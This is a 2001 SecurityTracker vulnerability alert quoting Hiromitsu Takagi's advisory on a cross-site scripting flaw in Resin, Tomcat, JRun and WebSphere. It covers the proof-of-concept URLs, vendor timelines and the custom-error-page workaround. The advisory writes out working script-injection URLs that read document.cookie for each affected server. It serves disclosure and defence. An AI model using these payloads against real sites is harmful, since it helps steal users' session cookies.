SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com





Category:   Application (Web Server/CGI)  >   Resin Vendors:   Caucho Technology
Resin Web Server Lets Remote Users Cause Arbitrary Javascript to be Executed by Another User's Browser
SecurityTracker Alert ID:  1001912
SecurityTracker URL:  http://securitytracker.com/id/1001912
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jul 2 2001
Impact:   Execution of arbitrary code via network
Exploit Included:  Yes  
Version(s): 1.2.2, possibly others
Description:   A cross-site scripting vulnerability has been reported in the Resin web server that allows remote users create specially crafted URLs that will cause Javascript to be executed by other users.

Resin is vulnerable to a URL cross-site scripting attack.

The following requests for non-existent files will cause the server to return the specified JavaScript code in the 'File Not Found' reply sent back to the requesting user.

http://[targethost]/<SCRIPT>alert(document.cookie)</SCRIPT>.jsp
http://[targethost]/<SCRIPT>document.write(document.cookie)</SCRIPT>.jsp

The Javascript code will then be executed by the requesting user within the server's domain.
Impact:   A remote user can create a web page or send an HTML-based e-mail message containing a specific URL that, when clicked on by the target user or when automatically fetched via Javascript code, will cause code in the URL to be executed by the target user's browser. The code will appear to the browser to be code from the server.
Solution:   It was unknown to the report author whether the vendor has fixed this yet or not. [Editor's note: The version of the product that is actually operating the vendor's web site appears to have been fixed.]
Vendor URL:  www.caucho.com/ (Links to External Site)
Cause:   Input validation error
Underlying OS:   Linux (Any), UNIX (Any), Windows (NT), Windows (2000)

Message History:   None.

 Source Message Contents
Date:  Mon, 02 Jul 2001 20:31:00 +0900
Subject:  Multiple Vendor Java Servlet Container Cross-Site Scripting Vulnerability


Multiple Vendor Java Servlet Container Cross-Site Scripting Vulnerability
=========================================================================

Affected products:
=================
  Tomcat 3.2.1, 3.2.2-beta, 4.0-beta
     <http://jakarta.apache.org/tomcat/>
  JRun 3.0
     <http://www.allaire.com/products/jrun/index.cfm>
  WebSphere 3.5 FP2, 3.02, VisualAge for Java 3.5 Professional
     <http://www-4.ibm.com/software/webservers/>
  Resin
     <http://www.caucho.com/products/resin/>


Not affected:
============
  Unknown


Problem:
=======
  Accessing the following URLs, the JavaScript code will be executed
  in the browser on the server's domain.

  Tomcat 3.2.1:
    http://Tomcat/jsp-mapped-dir/<SCRIPT>alert(document.cookie)</SCRIPT>.jsp
  JRun 3.0:
    http://JRun/<SCRIPT>alert(document.cookie)</SCRIPT>.shtml
    http://JRun/<SCRIPT>alert(document.cookie)</SCRIPT>.jsp
    http://JRun/<SCRIPT>alert(document.cookie)</SCRIPT>.thtml
  WebSphere 3.5 FP2:
    http://WebSphere/webapp/examples/<SCRIPT>alert(document.cookie)</SCRIPT>
  WebSphere 3.02:
    http://WebSphere/<SCRIPT>alert(document.cookie)</SCRIPT>.jsp
  VisualAge for Java 3.5 Professional:
    http://VisualAge-WebSphere-Test-Environment/<SCRIPT>alert(document.cookie)</SCRIPT>
  Resin 1.2.2:
    http://Reisin/<SCRIPT>alert(document.cookie)</SCRIPT>.jsp
    http://www.caucho.com/<SCRIPT>document.write(document.cookie)</SCRIPT>.jsp

  These pages produce output like this:
  =================================================
  Error 404
  An error has occurred while processing request:
  http://WebSphere/webapp/examples/******
  
  Message: File not found: //******
  StackTrace: com.ibm.servlet.engine.webapp.WebAppErrorReport: File not found: //******
          at javax.servlet.ServletException.<init>(ServletException.java:107)
          at com.ibm.websphere.servlet.error.ServletErrorReport.<init>(ServletErrorReport.java:31)
          at com.ibm.servlet.engine.webapp.WebAppErrorReport.<init>(WebAppErrorReport.java:20)
          at com.ibm.servlet.engine.webapp.WebAppDispatcherResponse.sendError(WebAppDispatcherResponse.java:97)
          ...
  =================================================
  ******: The JavaScript code is executed here.

  This vulnerability is quite similar to "IIS cross-site scripting
  vulnerabilities (MS00-060)" reported by Microsoft on August 25, 2000.
  <http://www.microsoft.com/technet/security/bulletin/ms00-060.asp>


Impact:
======
  For the detail about cross-site scripting, see the following pages.
  <http://www.cert.org/advisories/CA-2000-02.html>
  <http://www.microsoft.com/TechNet/security/crssite.asp>
  <http://www.apache.org/info/css-security/>


Vendor status:
=============

  Tomcat:
  ======
    Notified: 
      16 Mar 2001 04:32:02 +0900, I-found-a-security-problem-in-the-apache-source-code@apache.org
      17 Mar 2001 18:55:45 +0900, tomcat-dev@jakarta.apache.org
    Response: 
      17 Mar 2001 20:07:42 -0000
    Fix: 
      30 Mar 2001, Tomcat 4.0-beta-2 (maybe)
      11 May 2001, Tomcat 3.2.2-beta-5 (maybe)
    Announcement: 
      <http://jakarta.apache.org/tomcat/news.html>

      Sun Microsystems does not publish Tomcat vulnerabilities.
      <http://java.sun.com/products/jsp/tomcat/>
      <http://java.sun.com/sfaq/chronology.html>

  JRun:
  ====
    Notified: 
      13 Mar 2001 23:11:54 +0900, secure@allaire.com
    Response: 
      13 Mar 2001 09:43:49 -0500
      14 Mar 2001 09:05:03 -0500
    Fix: 
      28 Jun 2001, Patches for JRun 3.0 and JRun 2.3.3 are available.
    Announcement: 
      <http://www.allaire.com/handlers/index.cfm?ID=21498&Method=Full>
      Macromedia Product Security Bulletin (MPSB01-06) 
      JRun 3.1, JRun 3.0, JRun 2.3.3: Cross-site scripting vulnerability
      (a.k.a. JavaScript code execution vulnerability)

  WebSphere:
  =========
    Notified:
      20 Mar 2001 08:13:30 +0900, *******@us.ibm.com
    Response:
      22 Mar 2001 09:14:01 -0500
      23 Mar 2001 00:02:58 +0900
    Fix:
      PQ47386V302x (?)
      <http://www-4.ibm.com/software/webservers/appserv/efix.html>
    Announcement: 
      <http://www-6.ibm.com/jp/domino01/software/websphere.nsf/TechWeb/EC48D03C7060EAFA49256A1C0009C9F4?openDocument&&ViewName=TechWeb>
      (in Japanese)

  Resin:
  =====
    Notified:
      16 Mar 2001 02:26:47 +0900, bugs@caucho.com, resin@caucho.com
    Response: 
      None
    Fix:
      Unknown
    Announcement:
      Unknown
      http://www.caucho.com/products/resin/changes.xtp

Workaround:
==========
  Customize error pages.


--
Hiromitsu Takagi, Ph.D.
National Institute of Advanced Industrial Science and Technology,
Tsukuba Central 2, 1-1-1, Umezono, Tsukuba, Ibaraki 305-8568, Japan
http://www.etl.go.jp/~takagi/


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us

Copyright 2013, SecurityGlobal.net LLC